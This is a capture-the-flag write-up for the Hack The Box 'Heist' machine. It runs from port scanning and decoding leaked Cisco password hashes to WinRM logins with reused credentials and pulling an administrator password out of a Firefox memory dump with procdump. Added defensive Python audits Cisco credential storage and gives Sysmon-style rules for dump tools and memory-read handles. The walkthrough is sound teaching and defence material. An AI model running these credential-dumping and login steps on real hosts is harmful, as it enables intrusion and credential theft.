hackthebox-Heist

Lesson: different usernames may share the same password (credential reuse across accounts).

  • nmap scan with -p1-65535 finds ports 80, 135, 445, 5985 and 49668:

80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open wsman
49668/tcp open unknown
  • Browse http://10.10.10.149; under "Login as guest" download the attachment config.txt:

version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0 mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
  • config.txt contains three Cisco passwords: two are type 7 (reversible, decoded directly) and one is type 5 (cracked with hashcat). It also yields three usernames: rout3r, admin and Hazard. Guess: Hazard's account uses the type 5 password, stealth1agent.
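The point of this step from a defender's side is that the leaked config stored credentials in forms that are either reversible (type 7) or crackable offline (type 5), and `service password-encryption` gave no real protection. As an added example, not part of the original write-up, the Python script below audits a Cisco IOS config for exactly these storage types and for the malformed BGP mask in the same file. The sample config is the relevant subset of the write-up's config.txt; the severity levels, the `Finding` type and the remediation wording are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# Constructed sample: the credential and BGP lines from the write-up's config.txt.
SAMPLE_CONFIG = """\
version 12.2
service password-encryption
hostname ios-1
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
router bgp 100
 network 192.168.0.0 mask 300.255.255.0
line vty 0 4
 transport input ssh
"""


@dataclass(frozen=True)
class Finding:
    severity: str   # assumed scale: high / medium / low / info
    line_no: int
    line: str
    message: str


# Credential forms IOS writes into a config. The trailing number is the storage type:
# 0/none = plaintext, 7 = reversible obfuscation, 4 = deprecated unsalted SHA-256,
# 5 = salted MD5, 8 = PBKDF2-SHA256, 9 = scrypt.
USERNAME_RE = re.compile(
    r"^\s*username\s+(\S+)(?:\s+privilege\s+\d+)?\s+(password|secret)\s+(?:(\d+)\s+)?(\S+)\s*$")
ENABLE_RE = re.compile(r"^\s*enable\s+(password|secret)\s+(?:(\d+)\s+)?(\S+)\s*$")
MASK_RE = re.compile(r"^\s*network\s+\S+\s+mask\s+(\d+)\.(\d+)\.(\d+)\.(\d+)\s*$")


def _credential_finding(line_no, line, who, keyword, ptype):
    """Map (password|secret, type) to a finding, or None when storage is acceptable."""
    if keyword == "password":
        if ptype in (None, "0"):
            return Finding("high", line_no, line, f"{who}: plaintext password; use 'secret' instead")
        if ptype == "7":
            return Finding("high", line_no, line,
                           f"{who}: type 7 is reversible obfuscation, not encryption; "
                           "re-enter with 'secret' (type 8/9 where the IOS release supports it)")
        return Finding("medium", line_no, line, f"{who}: unrecognised password type {ptype}")
    # keyword == "secret"
    if ptype == "4":
        return Finding("high", line_no, line, f"{who}: deprecated type 4 secret; re-enter the secret")
    if ptype == "5":
        return Finding("medium", line_no, line,
                       f"{who}: type 5 (salted MD5) is crackable offline; prefer type 8/9 if supported")
    return None  # type 8/9 (or unknown future types) are left alone


def audit_cisco_config(text: str) -> list[Finding]:
    findings = []
    for n, raw in enumerate(text.splitlines(), start=1):
        line = raw.rstrip()
        if (m := USERNAME_RE.match(line)):
            user, keyword, ptype, _ = m.groups()
            f = _credential_finding(n, line, f"username {user}", keyword, ptype)
        elif (m := ENABLE_RE.match(line)):
            keyword, ptype, _ = m.groups()
            f = _credential_finding(n, line, "enable", keyword, ptype)
        elif line.strip() == "service password-encryption":
            f = Finding("info", n, line,
                        "only converts plaintext passwords to type 7; it is not a substitute for 'secret'")
        elif (m := MASK_RE.match(line)) and any(int(o) > 255 for o in m.groups()):
            f = Finding("low", n, line, "subnet mask octet above 255; the network statement is malformed")
        else:
            f = None
        if f:
            findings.append(f)
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per severity, for a one-line report."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.severity] = counts.get(f.severity, 0) + 1
    return counts


if __name__ == "__main__":
    report = audit_cisco_config(SAMPLE_CONFIG)
    for f in report:
        print(f"[{f.severity.upper():6}] line {f.line_no}: {f.message}")
    print(summarize(report))
```

Run against the sample it reports two high findings (the two type 7 user passwords), one medium (the type 5 enable secret), one info (`service password-encryption`) and one low (the 300.255.255.0 mask). The same regexes can be pointed at a whole running-config export; anything stored as type 8 or 9 produces no finding.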

  • Use impacket's lookupsid.py to enumerate further usernames; it finds support, Chase and Jason:

    ./lookupsid.py Hazard:stealth1agent@10.10.10.149
  • Use evil-winrm to brute-force logins with a wordlist built from the usernames and passwords collected above; this yields Chase's password:

    ruby evil-winrm.rb -i 10.10.10.149 -u Chase -p 'Q4)sJu\Y8qz*A3?d'

    This gives user.txt.

  • Listing the Users directory shows the local users Administrator, Chase and Hazard.

  • Enumerate processes; firefox is running.

  • Use evil-winrm's upload to transfer procdump64.exe, then dump the memory of the firefox process:

    ./Procdump64.exe -accepteula -ma 6276 firefox-6276.dmp
  • Search the memory dump for the new password:

    select-string firefox-6276.dmp -pattern "password" # login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
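From a detection standpoint, the two previous steps leave a distinctive trail on the host: a dump utility launched from a WinRM session (its parent is wsmprovhost.exe), and a process handle opened on a browser with memory-read access. As an added example, not part of the original write-up, the Python below runs three such checks over constructed Sysmon-style events (EventID 1 process creation, EventID 10 process access). The event dicts, the rule names and the trusted-process and credential-rich process lists are this example's own assumptions and would be tuned per environment.

```python
import ntpath

# Constructed Sysmon-style events (not real logs from the box): the first two model the
# write-up's dump step, the last two are benign activity that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\Chase\Documents\Procdump64.exe",
     "CommandLine": "./Procdump64.exe -accepteula -ma 6276 firefox-6276.dmp",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe", "User": r"HOST\Chase"},
    {"EventID": 10, "SourceImage": r"C:\Users\Chase\Documents\Procdump64.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "User": r"HOST\Chase"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "GrantedAccess": "0x1400"},
]

PROCESS_VM_READ = 0x0010          # access-mask bit needed to read another process's memory
DUMP_TOOLS = {"procdump.exe", "procdump64.exe"}        # assumption: extend with other dump utilities
REMOTE_SHELL_HOSTS = {"wsmprovhost.exe"}                 # WinRM provider host: parent of remoted commands
TRUSTED_HANDLE_OPENERS = {"csrss.exe", "wininit.exe", "lsass.exe", "msmpeng.exe"}  # assumption: tune per estate
CREDENTIAL_RICH = {"lsass.exe", "firefox.exe", "chrome.exe", "msedge.exe"}          # assumption


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def detect(events):
    """Return (rule, event_index, detail) tuples for events that match a rule."""
    alerts = []
    for i, ev in enumerate(events):
        if ev["EventID"] == 1:
            image = _base(ev["Image"])
            cmd = ev.get("CommandLine", "")
            # Rule 1: a known dump tool, or a full-dump switch on the command line.
            if image in DUMP_TOOLS or " -ma " in f" {cmd.lower()} ":
                alerts.append(("memory-dump-tool", i, f"{image} run by {ev['User']}: {cmd}"))
            # Rule 2: anything spawned by the WinRM host is an interactive remote session.
            if _base(ev["ParentImage"]) in REMOTE_SHELL_HOSTS:
                alerts.append(("winrm-child-process", i, f"{image} started under WinRM by {ev['User']}"))
        elif ev["EventID"] == 10:
            src, tgt = _base(ev["SourceImage"]), _base(ev["TargetImage"])
            access = int(ev["GrantedAccess"], 16)
            # Rule 3: untrusted process opens a credential-rich process with memory-read rights.
            if tgt in CREDENTIAL_RICH and access & PROCESS_VM_READ and src not in TRUSTED_HANDLE_OPENERS:
                alerts.append(("handle-with-vm-read", i,
                               f"{src} opened {tgt} with GrantedAccess {ev['GrantedAccess']}"))
    return alerts


if __name__ == "__main__":
    for rule, idx, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:22} event#{idx}: {detail}")
```

The first constructed event fires both the dump-tool rule and the WinRM-parent rule, the second fires the handle rule; the benign notepad launch and the csrss handle (no PROCESS_VM_READ bit, and a trusted opener) produce nothing. In practice the mitigation that removes this path is not logging but scope: WinRM access and local admin rights limited to the accounts that need them, and no shared passwords between the router config and Windows accounts.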
  • Log in with evil-winrm as Administrator using the new password; this gives root.txt.